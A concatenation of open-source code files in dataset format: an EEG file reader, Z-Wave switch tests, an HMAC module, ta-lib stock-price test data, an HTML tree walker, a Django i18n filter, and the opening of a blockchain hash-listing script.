ecg = _find_channels(ch_names, 'ECG')
if emg == 'auto':
emg = _find_channels(ch_names, 'EMG')
date, time = header_info['start_ts'].split()
date = date.split('-')
time = time.split(':')
sec, msec = time[2].split('.')
date = datetime.datetime(int(date[0]), int(date[1]), int(date[2]),
int(time[0]), int(time[1]), int(sec), int(msec))
info = _empty_info(header_info['sample_freq'])
info['meas_date'] = calendar.timegm(date.utctimetuple())
if ch_type == 'eeg':
ch_coil = FIFF.FIFFV_COIL_EEG
ch_kind = FIFF.FIFFV_EEG_CH
elif ch_type == 'seeg':
ch_coil = FIFF.FIFFV_COIL_EEG
ch_kind = FIFF.FIFFV_SEEG_CH
else:
raise TypeError("Channel type not recognized. Available types are "
"'eeg' and 'seeg'.")
cals = np.repeat(header_info['conversion_factor'] * 1e-6, len(ch_names))
info['chs'] = _create_chs(ch_names, cals, ch_coil, ch_kind, eog, ecg, emg,
misc)
info['highpass'] = 0.
info['lowpass'] = info['sfreq'] / 2.0
info._update_redundant()
return info, header_info
class RawNicolet(BaseRaw):
"""Raw object from Nicolet file.
Parameters
----------
input_fname : str
Path to the Nicolet file.
ch_type : str
Channel type to designate to the data channels. Supported data types
include 'eeg', 'seeg'.
montage : str | None | instance of Montage
Path or instance of montage containing electrode positions.
If None, sensor locations are (0,0,0). See the documentation of
:func:`mne.channels.read_montage` for more information.
eog : list | tuple | 'auto'
Names of channels or list of indices that should be designated
EOG channels. If 'auto', the channel names beginning with
``EOG`` are used. Defaults to empty tuple.
ecg : list or tuple | 'auto'
Names of channels or list of indices that should be designated
ECG channels. If 'auto', the channel names beginning with
``ECG`` are used. Defaults to empty tuple.
emg : list or tuple | 'auto'
Names of channels or list of indices that should be designated
EMG channels. If 'auto', the channel names beginning with
``EMG`` are used. Defaults to empty tuple.
misc : list or tuple
Names of channels or list of indices that should be designated
MISC channels. Defaults to empty tuple.
preload : bool or str (default False)
Preload data into memory for data manipulation and faster indexing.
If True, the data will be preloaded into memory (fast, requires
large amount of memory). If preload is a string, preload is the
file name of a memory-mapped file which is used to store the data
on the hard drive (slower, requires less memory).
verbose : bool, str, int, or None
If not None, override default verbose level (see :func:`mne.verbose`
and :ref:`Logging documentation <tut_logging>` for more).
See Also
--------
    mne.io.Raw : Documentation of attributes and methods.
"""
def __init__(self, input_fname, ch_type, montage=None, eog=(), ecg=(),
emg=(), misc=(), preload=False, verbose=None): # noqa: D102
input_fname = path.abspath(input_fname)
info, header_info = _get_nicolet_info(input_fname, ch_type, eog, ecg,
emg, misc)
last_samps = [header_info['num_samples'] - 1]
_check_update_montage(info, montage)
super(RawNicolet, self).__init__(
info, preload, filenames=[input_fname], raw_extras=[header_info],
last_samps=last_samps, orig_format='int',
verbose=verbose)
def _read_segment_file(self, data, idx, fi, start, stop, cals, mult):
"""Read a chunk of raw data."""
_read_segments_file(self, data, idx, fi, start, stop, cals, mult)
| bsd-3-clause |
w1ll1am23/home-assistant | tests/components/zwave/test_switch.py | 11 | 2347 | """Test Z-Wave switches."""
from unittest.mock import patch
from homeassistant.components.zwave import switch
from tests.mock.zwave import MockEntityValues, MockNode, MockValue, value_changed
def test_get_device_detects_switch(mock_openzwave):
"""Test get_device returns a Z-Wave switch."""
node = MockNode()
value = MockValue(data=0, node=node)
values = MockEntityValues(primary=value)
device = switch.get_device(node=node, values=values, node_config={})
assert isinstance(device, switch.ZwaveSwitch)
def test_switch_turn_on_and_off(mock_openzwave):
"""Test turning on a Z-Wave switch."""
node = MockNode()
value = MockValue(data=0, node=node)
values = MockEntityValues(primary=value)
device = switch.get_device(node=node, values=values, node_config={})
device.turn_on()
assert node.set_switch.called
value_id, state = node.set_switch.mock_calls[0][1]
assert value_id == value.value_id
assert state is True
node.reset_mock()
device.turn_off()
assert node.set_switch.called
value_id, state = node.set_switch.mock_calls[0][1]
assert value_id == value.value_id
assert state is False
def test_switch_value_changed(mock_openzwave):
"""Test value changed for Z-Wave switch."""
node = MockNode()
value = MockValue(data=False, node=node)
values = MockEntityValues(primary=value)
device = switch.get_device(node=node, values=values, node_config={})
assert not device.is_on
value.data = True
value_changed(value)
assert device.is_on
@patch("time.perf_counter")
def test_switch_refresh_on_update(mock_counter, mock_openzwave):
"""Test value changed for refresh on update Z-Wave switch."""
mock_counter.return_value = 10
node = MockNode(manufacturer_id="013c", product_type="0001", product_id="0005")
value = MockValue(data=False, node=node, instance=1)
values = MockEntityValues(primary=value)
device = switch.get_device(node=node, values=values, node_config={})
assert not device.is_on
mock_counter.return_value = 15
value.data = True
value_changed(value)
assert device.is_on
assert not node.request_state.called
mock_counter.return_value = 45
value.data = False
value_changed(value)
assert not device.is_on
assert node.request_state.called
| apache-2.0 |
kuri65536/python-for-android | python-build/python-libs/gdata/build/lib/gdata/tlslite/utils/hmac.py | 403 | 3286 | """HMAC (Keyed-Hashing for Message Authentication) Python module.
Implements the HMAC algorithm as described by RFC 2104.
(This file is modified from the standard library version to do faster
copying)
"""
def _strxor(s1, s2):
"""Utility method. XOR the two strings s1 and s2 (must have same length).
"""
return "".join(map(lambda x, y: chr(ord(x) ^ ord(y)), s1, s2))
# The size of the digests returned by HMAC depends on the underlying
# hashing module used.
digest_size = None
class HMAC:
"""RFC2104 HMAC class.
This supports the API for Cryptographic Hash Functions (PEP 247).
"""
def __init__(self, key, msg = None, digestmod = None):
"""Create a new HMAC object.
key: key for the keyed hash object.
msg: Initial input for the hash, if provided.
digestmod: A module supporting PEP 247. Defaults to the md5 module.
"""
if digestmod is None:
import md5
digestmod = md5
        if key is None:  # TREVNEW - for faster copying
return #TREVNEW
self.digestmod = digestmod
self.outer = digestmod.new()
self.inner = digestmod.new()
self.digest_size = digestmod.digest_size
blocksize = 64
ipad = "\x36" * blocksize
opad = "\x5C" * blocksize
if len(key) > blocksize:
key = digestmod.new(key).digest()
key = key + chr(0) * (blocksize - len(key))
self.outer.update(_strxor(key, opad))
self.inner.update(_strxor(key, ipad))
if msg is not None:
self.update(msg)
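    # Note (added sketch): the two update() calls above set up the RFC 2104
    # construction HMAC(K, m) = H((K xor opad) || H((K xor ipad) || m)),
    # where H is the underlying digest. self.inner accumulates the message;
    # digest() below finishes the outer hash over the inner digest.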
## def clear(self):
## raise NotImplementedError, "clear() method not available in HMAC."
def update(self, msg):
"""Update this hashing object with the string msg.
"""
self.inner.update(msg)
def copy(self):
"""Return a separate copy of this hashing object.
An update to this copy won't affect the original object.
"""
other = HMAC(None) #TREVNEW - for faster copying
other.digest_size = self.digest_size #TREVNEW
other.digestmod = self.digestmod
other.inner = self.inner.copy()
other.outer = self.outer.copy()
return other
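    # Note (added): HMAC(None) above deliberately skips the key-padding work
    # in __init__; copy() then clones the two digest states directly. This
    # is the "faster copying" optimization the TREVNEW comments refer to.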
def digest(self):
"""Return the hash value of this hashing object.
This returns a string containing 8-bit data. The object is
not altered in any way by this function; you can continue
updating the object after calling this function.
"""
h = self.outer.copy()
h.update(self.inner.digest())
return h.digest()
def hexdigest(self):
"""Like digest(), but returns a string of hexadecimal digits instead.
"""
return "".join([hex(ord(x))[2:].zfill(2)
for x in tuple(self.digest())])
def new(key, msg = None, digestmod = None):
"""Create a new hashing object and return it.
key: The starting key for the hash.
msg: if available, will immediately be hashed into the object's starting
state.
You can now feed arbitrary strings into the object using its update()
method, and can ask for the hash value at any time by calling its digest()
method.
"""
return HMAC(key, msg, digestmod)
| apache-2.0 |
quantopian/ta-lib | talib/test_data.py | 5 | 16297 |
from __future__ import print_function
import numpy as np
from nose.tools import assert_equal, assert_not_equal, assert_true
ford_2012_dates = np.asarray([ 20120103, 20120104, 20120105, 20120106, 20120109,
20120110, 20120111, 20120112, 20120113, 20120117, 20120118, 20120119,
20120120, 20120123, 20120124, 20120125, 20120126, 20120127, 20120130,
20120131, 20120201, 20120202, 20120203, 20120206, 20120207, 20120208,
20120209, 20120210, 20120213, 20120214, 20120215, 20120216, 20120217,
20120221, 20120222, 20120223, 20120224, 20120227, 20120228, 20120229,
20120301, 20120302, 20120305, 20120306, 20120307, 20120308, 20120309,
20120312, 20120313, 20120314, 20120315, 20120316, 20120319, 20120320,
20120321, 20120322, 20120323, 20120326, 20120327, 20120328, 20120329,
20120330, 20120402, 20120403, 20120404, 20120405, 20120409, 20120410,
20120411, 20120412, 20120413, 20120416, 20120417, 20120418, 20120419,
20120420, 20120423, 20120424, 20120425, 20120426, 20120427, 20120430,
20120501, 20120502, 20120503, 20120504, 20120507, 20120508, 20120509,
20120510, 20120511, 20120514, 20120515, 20120516, 20120517, 20120518,
20120521, 20120522, 20120523, 20120524, 20120525, 20120529, 20120530,
20120531, 20120601, 20120604, 20120605, 20120606, 20120607, 20120608,
20120611, 20120612, 20120613, 20120614, 20120615, 20120618, 20120619,
20120620, 20120621, 20120622, 20120625, 20120626, 20120627, 20120628,
20120629, 20120702, 20120703, 20120705, 20120706, 20120709, 20120710,
20120711, 20120712, 20120713, 20120716, 20120717, 20120718, 20120719,
20120720, 20120723, 20120724, 20120725, 20120726, 20120727, 20120730,
20120731, 20120801, 20120802, 20120803, 20120806, 20120807, 20120808,
20120809, 20120810, 20120813, 20120814, 20120815, 20120816, 20120817,
20120820, 20120821, 20120822, 20120823, 20120824, 20120827, 20120828,
20120829, 20120830, 20120831, 20120904, 20120905, 20120906, 20120907,
20120910, 20120911, 20120912, 20120913, 20120914, 20120917, 20120918,
20120919, 20120920, 20120921, 20120924, 20120925, 20120926, 20120927,
20120928, 20121001, 20121002, 20121003, 20121004, 20121005, 20121008,
20121009, 20121010, 20121011, 20121012, 20121015, 20121016, 20121017,
20121018, 20121019, 20121022, 20121023, 20121024, 20121025, 20121026,
20121031, 20121101, 20121102, 20121105, 20121106, 20121107, 20121108,
20121109, 20121112, 20121113, 20121114, 20121115, 20121116, 20121119,
20121120, 20121121, 20121123, 20121126, 20121127, 20121128, 20121129,
20121130, 20121203, 20121204, 20121205, 20121206, 20121207, 20121210,
20121211, 20121212, 20121213, 20121214, 20121217, 20121218, 20121219,
20121220, 20121221, 20121224, 20121226, 20121227, 20121228, 20121231 ])
ford_2012 = {
'open': np.asarray([ 11.00, 11.15, 11.33, 11.74, 11.83, 12.00, 11.74, 12.16,
12.01, 12.20, 12.03, 12.48, 12.55, 12.69, 12.56, 12.80, 13.03, 11.96,
12.06, 12.47, 12.73, 12.40, 12.47, 12.85, 12.93, 12.91, 12.89, 12.52,
12.74, 12.46, 12.47, 12.38, 12.84, 12.74, 12.49, 12.27, 12.43, 12.11,
12.34, 12.28, 12.48, 12.74, 12.67, 12.23, 12.21, 12.41, 12.53, 12.57,
12.48, 12.64, 12.90, 12.86, 12.52, 12.48, 12.59, 12.48, 12.31, 12.45,
12.51, 12.35, 12.33, 12.55, 12.50, 12.71, 12.46, 12.38, 12.26, 12.19,
11.99, 11.94, 11.98, 12.01, 11.98, 11.81, 11.81, 11.71, 11.15, 11.61,
11.51, 11.71, 12.03, 11.42, 11.25, 11.16, 11.13, 10.84, 10.53, 10.60,
10.48, 10.83, 10.61, 10.41, 10.34, 10.23, 10.16, 10.08, 10.02, 10.25,
10.32, 10.50, 10.61, 10.69, 10.73, 10.62, 10.33, 10.15, 10.01, 10.29,
10.73, 10.48, 10.77, 10.47, 10.39, 10.27, 10.40, 10.35, 10.37, 10.58,
10.65, 10.35, 10.13, 10.06, 10.05, 9.93, 9.95, 9.50, 9.53, 9.67, 9.47,
9.46, 9.50, 9.33, 9.26, 9.16, 9.22, 9.28, 9.38, 9.45, 9.28, 9.08, 9.17,
9.17, 9.05, 8.99, 9.04, 9.13, 9.29, 8.99, 9.02, 9.13, 9.18, 9.25, 9.31,
9.30, 9.35, 9.45, 9.44, 9.50, 9.65, 9.58, 9.65, 9.50, 9.45, 9.42, 9.51,
9.37, 9.33, 9.30, 9.39, 9.37, 9.45, 9.66, 9.95, 10.08, 10.18, 10.25,
10.20, 10.41, 10.27, 10.30, 10.49, 10.48, 10.53, 10.30, 10.35, 9.98,
10.13, 9.99, 9.89, 10.01, 9.82, 10.06, 10.17, 10.06, 10.21, 10.12,
10.06, 10.14, 10.11, 10.26, 10.31, 10.36, 10.42, 10.14, 10.02, 10.08,
10.42, 10.35, 10.70, 11.19, 11.31, 11.15, 11.33, 11.25, 11.07, 10.76,
11.03, 10.89, 11.02, 10.57, 10.58, 10.65, 10.85, 10.84, 10.98, 11.05,
11.10, 11.05, 11.32, 11.52, 11.56, 11.40, 11.32, 11.26, 11.27, 11.41,
11.51, 11.52, 11.46, 11.27, 11.16, 11.48, 11.79, 11.74, 11.55, 11.67,
12.31, 12.79, 12.55, 12.88, ]),
'high': np.asarray([ 11.25, 11.53, 11.63, 11.80, 11.95, 12.05, 12.18, 12.18,
12.08, 12.26, 12.37, 12.72, 12.64, 12.84, 12.86, 12.98, 13.05, 12.53,
12.44, 12.51, 12.75, 12.43, 12.84, 13.00, 12.97, 12.96, 12.90, 12.66,
12.74, 12.58, 12.57, 12.77, 12.88, 12.76, 12.51, 12.44, 12.46, 12.36,
12.35, 12.55, 12.77, 12.94, 12.68, 12.25, 12.30, 12.55, 12.73, 12.59,
12.72, 12.90, 13.04, 12.90, 12.68, 12.61, 12.67, 12.54, 12.37, 12.50,
12.61, 12.36, 12.52, 12.58, 12.65, 12.95, 12.52, 12.58, 12.29, 12.28,
12.02, 12.13, 12.03, 12.05, 12.00, 11.85, 11.88, 11.72, 11.40, 11.61,
11.75, 11.93, 12.04, 11.47, 11.34, 11.17, 11.15, 10.87, 10.79, 10.64,
10.81, 10.86, 10.83, 10.53, 10.34, 10.43, 10.25, 10.18, 10.23, 10.40,
10.45, 10.62, 10.68, 10.88, 10.75, 10.68, 10.37, 10.18, 10.24, 10.58,
10.78, 10.68, 10.80, 10.55, 10.49, 10.45, 10.42, 10.40, 10.64, 10.74,
10.68, 10.40, 10.18, 10.08, 10.10, 10.09, 9.98, 9.60, 9.79, 9.74, 9.52,
9.47, 9.55, 9.38, 9.28, 9.32, 9.32, 9.35, 9.52, 9.50, 9.35, 9.21, 9.24,
9.20, 9.11, 9.10, 9.18, 9.28, 9.42, 9.03, 9.15, 9.21, 9.39, 9.38, 9.46,
9.36, 9.42, 9.66, 9.54, 9.67, 9.66, 9.64, 9.70, 9.56, 9.54, 9.52, 9.52,
9.44, 9.40, 9.34, 9.43, 9.47, 9.62, 9.96, 10.23, 10.28, 10.25, 10.30,
10.38, 10.57, 10.42, 10.45, 10.66, 10.52, 10.54, 10.40, 10.37, 10.12,
10.18, 10.00, 10.08, 10.05, 10.02, 10.15, 10.28, 10.12, 10.25, 10.12,
10.26, 10.25, 10.25, 10.32, 10.41, 10.57, 10.43, 10.24, 10.11, 10.29,
10.49, 10.42, 11.17, 11.30, 11.38, 11.35, 11.59, 11.34, 11.23, 11.10,
11.16, 11.10, 11.05, 10.80, 10.64, 10.90, 11.02, 11.00, 11.10, 11.14,
11.27, 11.26, 11.53, 11.60, 11.70, 11.44, 11.40, 11.31, 11.50, 11.53,
11.58, 11.56, 11.50, 11.27, 11.41, 11.68, 11.85, 11.80, 11.86, 12.40,
12.79, 12.81, 12.88, 13.08, ]),
'low': np.asarray([ 10.99, 11.07, 11.24, 11.52, 11.70, 11.63, 11.65, 11.89,
11.84, 11.96, 12.00, 12.43, 12.45, 12.55, 12.46, 12.70, 12.66, 11.79,
12.00, 12.20, 12.29, 12.20, 12.39, 12.71, 12.83, 12.80, 12.67, 12.37,
12.51, 12.34, 12.33, 12.38, 12.71, 12.46, 12.22, 12.16, 12.19, 11.99,
12.20, 12.25, 12.45, 12.68, 12.41, 12.00, 12.15, 12.32, 12.48, 12.37,
12.40, 12.63, 12.83, 12.51, 12.48, 12.39, 12.55, 12.24, 12.18, 12.39,
12.30, 12.18, 12.24, 12.40, 12.44, 12.46, 12.32, 12.38, 12.11, 11.65,
11.88, 11.86, 11.84, 11.83, 11.88, 11.72, 11.58, 11.39, 11.15, 11.36,
11.43, 11.67, 11.52, 11.15, 11.11, 11.00, 10.85, 10.63, 10.52, 10.40,
10.41, 10.66, 10.56, 10.30, 10.10, 10.15, 10.01, 9.96, 10.00, 10.15,
10.22, 10.38, 10.51, 10.68, 10.52, 10.40, 10.06, 9.91, 9.97, 10.27,
10.52, 10.38, 10.45, 10.31, 10.22, 10.21, 10.26, 10.26, 10.35, 10.52,
10.25, 10.18, 9.95, 9.96, 9.97, 9.93, 9.46, 9.30, 9.49, 9.53, 9.40,
9.31, 9.28, 9.26, 9.12, 9.14, 9.15, 9.12, 9.34, 9.33, 9.18, 9.05, 8.95,
8.91, 8.83, 8.88, 9.01, 9.12, 8.99, 8.82, 8.96, 9.09, 9.18, 9.24, 9.30,
9.23, 9.25, 9.42, 9.41, 9.49, 9.60, 9.51, 9.52, 9.40, 9.42, 9.41, 9.38,
9.31, 9.29, 9.25, 9.31, 9.35, 9.39, 9.66, 9.93, 10.06, 10.13, 10.17,
10.12, 10.39, 10.26, 10.28, 10.45, 10.35, 10.36, 10.26, 10.06, 9.86,
10.02, 9.81, 9.88, 9.71, 9.76, 9.96, 10.13, 9.99, 10.02, 9.95, 10.05,
10.09, 10.09, 10.22, 10.26, 10.33, 10.13, 10.03, 9.97, 10.01, 10.28,
10.22, 10.60, 10.88, 11.15, 11.13, 11.26, 11.04, 10.89, 10.71, 10.96,
10.86, 10.62, 10.46, 10.38, 10.65, 10.76, 10.80, 10.96, 10.97, 11.10,
10.98, 11.32, 11.33, 11.40, 11.23, 11.18, 11.19, 11.26, 11.41, 11.40,
11.43, 11.21, 11.03, 11.14, 11.40, 11.62, 11.58, 11.47, 11.67, 12.31,
12.36, 12.52, 12.76, ]),
'close': np.asarray([ 11.13, 11.30, 11.59, 11.71, 11.80, 11.80, 12.07, 12.14,
12.04, 12.02, 12.34, 12.61, 12.59, 12.66, 12.82, 12.93, 12.79, 12.21,
12.29, 12.42, 12.33, 12.26, 12.79, 12.96, 12.88, 12.84, 12.69, 12.44,
12.54, 12.48, 12.38, 12.74, 12.75, 12.53, 12.28, 12.40, 12.23, 12.30,
12.25, 12.38, 12.66, 12.72, 12.46, 12.09, 12.24, 12.46, 12.58, 12.43,
12.70, 12.88, 12.90, 12.51, 12.63, 12.54, 12.57, 12.32, 12.32, 12.48,
12.32, 12.32, 12.50, 12.48, 12.62, 12.64, 12.51, 12.47, 12.22, 11.79,
11.91, 12.07, 11.92, 11.88, 11.91, 11.79, 11.66, 11.41, 11.35, 11.39,
11.73, 11.87, 11.60, 11.28, 11.23, 11.10, 10.92, 10.67, 10.66, 10.61,
10.69, 10.71, 10.58, 10.32, 10.15, 10.16, 10.01, 10.01, 10.20, 10.19,
10.41, 10.59, 10.60, 10.84, 10.66, 10.56, 10.12, 10.04, 10.19, 10.57,
10.55, 10.66, 10.45, 10.50, 10.30, 10.41, 10.35, 10.34, 10.56, 10.65,
10.27, 10.19, 10.01, 10.01, 10.02, 10.09, 9.59, 9.39, 9.60, 9.57, 9.50,
9.45, 9.35, 9.33, 9.13, 9.27, 9.26, 9.34, 9.38, 9.35, 9.21, 9.17, 9.06,
8.97, 8.96, 9.00, 9.10, 9.24, 9.04, 8.92, 9.09, 9.15, 9.31, 9.35, 9.34,
9.35, 9.40, 9.44, 9.49, 9.59, 9.63, 9.63, 9.53, 9.49, 9.45, 9.49, 9.39,
9.34, 9.32, 9.31, 9.34, 9.41, 9.57, 9.92, 10.14, 10.11, 10.15, 10.21,
10.34, 10.53, 10.39, 10.42, 10.59, 10.44, 10.40, 10.32, 10.09, 10.01,
10.02, 9.86, 9.93, 9.79, 9.94, 10.11, 10.16, 10.05, 10.10, 9.98, 10.14,
10.12, 10.22, 10.30, 10.41, 10.43, 10.18, 10.17, 10.00, 10.17, 10.39,
10.36, 11.16, 11.25, 11.17, 11.25, 11.42, 11.06, 10.90, 10.93, 10.97,
11.00, 10.67, 10.57, 10.50, 10.83, 10.85, 10.92, 11.10, 11.11, 11.10,
11.25, 11.53, 11.45, 11.41, 11.31, 11.31, 11.24, 11.48, 11.47, 11.49,
11.47, 11.27, 11.10, 11.39, 11.67, 11.73, 11.77, 11.86, 12.40, 12.79,
12.76, 12.87, 12.95, ]),
'volume': np.asarray([ 45709900, 79725200, 67877500, 59840700, 53981500,
121750600, 63806000, 48687700, 46366700, 44398400, 47102700, 70894200,
43705700, 49379700, 45768400, 54021600, 75470700, 142155300, 57752600,
46412100, 71669000, 48347600, 78851200, 46363300, 39413500, 35352500,
52290500, 52505500, 34474400, 39627900, 38174800, 49164400, 30778000,
38409800, 43326000, 36747600, 31399300, 38703400, 30789000, 62093700,
68262000, 49063500, 28433700, 57374500, 28440900, 37099100, 36159300,
30275700, 42783600, 47578500, 55286600, 77119600, 52445700, 40214400,
27521400, 50117100, 44755000, 26692200, 35070700, 41051700, 51039700,
36381000, 43966900, 97034200, 51505000, 37939500, 42515300, 77370300,
34724400, 26988800, 39675000, 31903500, 35981200, 32314000, 48169200,
52631000, 31269200, 38615200, 45185400, 40889300, 83070300, 46156300,
43959200, 48572900, 40238400, 53268400, 33235200, 46174500, 54501200,
42526100, 36561300, 50225200, 41886500, 44321300, 49648900, 50572000,
38134900, 44295700, 75647800, 45334100, 30430800, 43760600, 44592100,
54297000, 68237000, 57305600, 38326200, 50458000, 33846100, 30811600,
35811400, 35130800, 53471900, 37531800, 39442000, 27361000, 37155900,
40810100, 40062800, 56427300, 44297600, 31871900, 33278900, 38648400,
138138600, 63388600, 49629300, 31783900, 30355400, 37441600, 33516600,
32028700, 55111000, 30248300, 28838200, 29510000, 31010000, 33615000,
27968300, 33773800, 53519200, 44338200, 51798900, 67986800, 40958300,
41360900, 65973000, 45326500, 38631400, 23819100, 43574500, 22630300,
30909800, 19618800, 21122000, 21129500, 21308300, 34323700, 34533900,
38923800, 26281100, 26965500, 23537700, 19574600, 22754200, 23084400,
26115700, 16459400, 28029200, 37965000, 40608800, 67996400, 60617000,
43381300, 28165300, 28046500, 50920200, 55934300, 31922200, 34937000,
42403000, 28755100, 35459800, 28557900, 36866300, 44362600, 25740900,
44586300, 33445600, 63630000, 51023800, 46855500, 40693900, 25473900,
38235700, 33951600, 39328700, 24108500, 26466500, 32788400, 29346300,
44041700, 40493000, 39149700, 32476500, 49339800, 59290900, 43485500,
137960900, 88770100, 53399000, 37995000, 51232200, 56674900, 45948800,
40703600, 25723100, 33342900, 45664700, 48879800, 45346200, 39359100,
34739800, 21181700, 16032200, 26831700, 37610000, 38496900, 57289300,
41329600, 47746300, 37760200, 33152400, 31065800, 38404500, 26025200,
36326900, 31099900, 35443200, 36933500, 46983300, 61810400, 54884700,
47750100, 94489300, 91734900, 140331900, 108315100, 95668600, 106908900 ]),
}
series = np.array([ 91.50, 94.81, 94.38, 95.09, 93.78, 94.62, 92.53, 92.75,
90.31, 92.47, 96.12, 97.25, 98.50, 89.88, 91.00, 92.81, 89.16, 89.34,
91.62, 89.88, 88.38, 87.62, 84.78, 83.00, 83.50, 81.38, 84.44, 89.25,
86.38, 86.25, 85.25, 87.12, 85.81, 88.97, 88.47, 86.88, 86.81, 84.88,
84.19, 83.88, 83.38, 85.50, 89.19, 89.44, 91.09, 90.75, 91.44, 89.00,
91.00, 90.50, 89.03, 88.81, 84.28, 83.50, 82.69, 84.75, 85.66, 86.19,
88.94, 89.28, 88.62, 88.50, 91.97, 91.50, 93.25, 93.50, 93.16, 91.72,
90.00, 89.69, 88.88, 85.19, 83.38, 84.88, 85.94, 97.25, 99.88, 104.94,
106.00, 102.50, 102.41, 104.59, 106.12, 106.00, 106.06, 104.62, 108.62,
109.31, 110.50, 112.75, 123.00, 119.62, 118.75, 119.25, 117.94, 116.44,
115.19, 111.88, 110.59, 118.12, 116.00, 116.00, 112.00, 113.75, 112.94,
116.00, 120.50, 116.62, 117.00, 115.25, 114.31, 115.50, 115.87, 120.69,
120.19, 120.75, 124.75, 123.37, 122.94, 122.56, 123.12, 122.56, 124.62,
129.25, 131.00, 132.25, 131.00, 132.81, 134.00, 137.38, 137.81, 137.88,
137.25, 136.31, 136.25, 134.63, 128.25, 129.00, 123.87, 124.81, 123.00,
126.25, 128.38, 125.37, 125.69, 122.25, 119.37, 118.50, 123.19, 123.50,
122.19, 119.31, 123.31, 121.12, 123.37, 127.37, 128.50, 123.87, 122.94,
121.75, 124.44, 122.00, 122.37, 122.94, 124.00, 123.19, 124.56, 127.25,
125.87, 128.86, 132.00, 130.75, 134.75, 135.00, 132.38, 133.31, 131.94,
130.00, 125.37, 130.13, 127.12, 125.19, 122.00, 125.00, 123.00, 123.50,
120.06, 121.00, 117.75, 119.87, 122.00, 119.19, 116.37, 113.50, 114.25,
110.00, 105.06, 107.00, 107.87, 107.00, 107.12, 107.00, 91.00, 93.94,
93.87, 95.50, 93.00, 94.94, 98.25, 96.75, 94.81, 94.37, 91.56, 90.25,
93.94, 93.62, 97.00, 95.00, 95.87, 94.06, 94.62, 93.75, 98.00, 103.94,
107.87, 106.06, 104.50, 105.00, 104.19, 103.06, 103.42, 105.27, 111.87,
116.00, 116.62, 118.28, 113.37, 109.00, 109.70, 109.25, 107.00, 109.19,
110.00, 109.20, 110.12, 108.00, 108.62, 109.75, 109.81, 109.00, 108.75,
107.87 ])
def assert_np_arrays_equal(expected, got):
for i, value in enumerate(expected):
if np.isnan(value):
assert_true(np.isnan(got[i]))
else:
assert_equal(value, got[i])
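# Illustrative use of the NaN-aware check above (added sketch, not part of
# the original test data):
#   assert_np_arrays_equal([np.nan, 1.0], np.array([np.nan, 1.0]))  # passes
#   assert_np_arrays_equal([1.0], np.array([2.0]))  # raises AssertionError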
def assert_np_arrays_not_equal(expected, got):
''' Verifies expected and got have the same number of leading nan fields,
followed by different floats.
'''
nans = []
equals = []
for i, value in enumerate(expected):
if np.isnan(value):
assert_true(np.isnan(got[i]))
nans.append(value)
else:
try:
assert_not_equal(value, got[i])
except AssertionError:
equals.append(got[i])
if len(equals) == len(expected[len(nans):]):
raise AssertionError('Arrays were equal.')
elif equals:
print('Arrays had %i/%i equivalent values.' % (len(equals), len(expected[len(nans):])))
| bsd-2-clause |
docmeth02/CouchPotatoServer | libs/html5lib/treewalkers/genshistream.py | 1730 | 2278 | from __future__ import absolute_import, division, unicode_literals
from genshi.core import QName
from genshi.core import START, END, XML_NAMESPACE, DOCTYPE, TEXT
from genshi.core import START_NS, END_NS, START_CDATA, END_CDATA, PI, COMMENT
from . import _base
from ..constants import voidElements, namespaces
class TreeWalker(_base.TreeWalker):
def __iter__(self):
# Buffer the events so we can pass in the following one
previous = None
for event in self.tree:
if previous is not None:
for token in self.tokens(previous, event):
yield token
previous = event
# Don't forget the final event!
if previous is not None:
for token in self.tokens(previous, None):
yield token
def tokens(self, event, next):
kind, data, pos = event
if kind == START:
tag, attribs = data
name = tag.localname
namespace = tag.namespace
converted_attribs = {}
for k, v in attribs:
if isinstance(k, QName):
converted_attribs[(k.namespace, k.localname)] = v
else:
converted_attribs[(None, k)] = v
if namespace == namespaces["html"] and name in voidElements:
for token in self.emptyTag(namespace, name, converted_attribs,
not next or next[0] != END
or next[1] != tag):
yield token
else:
yield self.startTag(namespace, name, converted_attribs)
elif kind == END:
name = data.localname
namespace = data.namespace
if name not in voidElements:
yield self.endTag(namespace, name)
elif kind == COMMENT:
yield self.comment(data)
elif kind == TEXT:
for token in self.text(data):
yield token
elif kind == DOCTYPE:
yield self.doctype(*data)
elif kind in (XML_NAMESPACE, DOCTYPE, START_NS, END_NS,
START_CDATA, END_CDATA, PI):
pass
else:
yield self.unknown(kind)
| gpl-3.0 |
brunogamacatao/portalsaladeaula | mediagenerator/filters/i18n.py | 2 | 2150 | from django.conf import settings
from django.http import HttpRequest
from django.utils.encoding import smart_str
from django.views.i18n import javascript_catalog
from hashlib import sha1
from mediagenerator.generators.bundles.base import Filter
if settings.USE_I18N:
LANGUAGES = [code for code, _ in settings.LANGUAGES]
else:
LANGUAGES = (settings.LANGUAGE_CODE,)
class I18N(Filter):
takes_input = False
def __init__(self, **kwargs):
super(I18N, self).__init__(**kwargs)
assert self.filetype == 'js', (
'I18N only supports compilation to js. '
'The parent filter expects "%s".' % self.filetype)
def get_variations(self):
return {'language': LANGUAGES}
def get_output(self, variation):
language = variation['language']
yield self._generate(language)
def get_dev_output(self, name, variation):
language = variation['language']
assert language == name
return self._generate(language)
def get_dev_output_names(self, variation):
language = variation['language']
content = self._generate(language)
hash = sha1(smart_str(content)).hexdigest()
yield language, hash
def _generate(self, language):
language_bidi = language.split('-')[0] in settings.LANGUAGES_BIDI
request = HttpRequest()
request.GET['language'] = language
# Add some JavaScript data
content = 'var LANGUAGE_CODE = "%s";\n' % language
content += 'var LANGUAGE_BIDI = ' + \
(language_bidi and 'true' or 'false') + ';\n'
content += javascript_catalog(request,
packages=settings.INSTALLED_APPS).content
# The hgettext() function just calls gettext() internally, but
# it won't get indexed by makemessages.
content += '\nwindow.hgettext = function(text) { return gettext(text); };\n'
# Add a similar hngettext() function
content += 'window.hngettext = function(singular, plural, count) { return ngettext(singular, plural, count); };\n'
return content
| bsd-3-clause |
LIMXTEC/BitSend | contrib/linearize/linearize-hashes.py | 3 | 3974 | #!/usr/bin/env python3
#
# linearize-hashes.py: List blocks in a linear, no-fork version of the chain.
#
# Copyright (c) 2013-2016 The Bitsend Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
from __future__ import print_function
try: # Python 3
import http.client as httplib
except ImportError: # Python 2
import httplib
import json
import re
import base64
import sys
settings = {}
##### Switch endian-ness #####
def hex_switchEndian(s):
""" Switches the endianness of a hex string (in pairs of hex chars) """
pairList = [s[i:i+2].encode() for i in range(0, len(s), 2)]
return b''.join(pairList[::-1]).decode()
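# A quick illustration (added; example value is arbitrary):
#   hex_switchEndian('1a2b3c') -> '3c2b1a'
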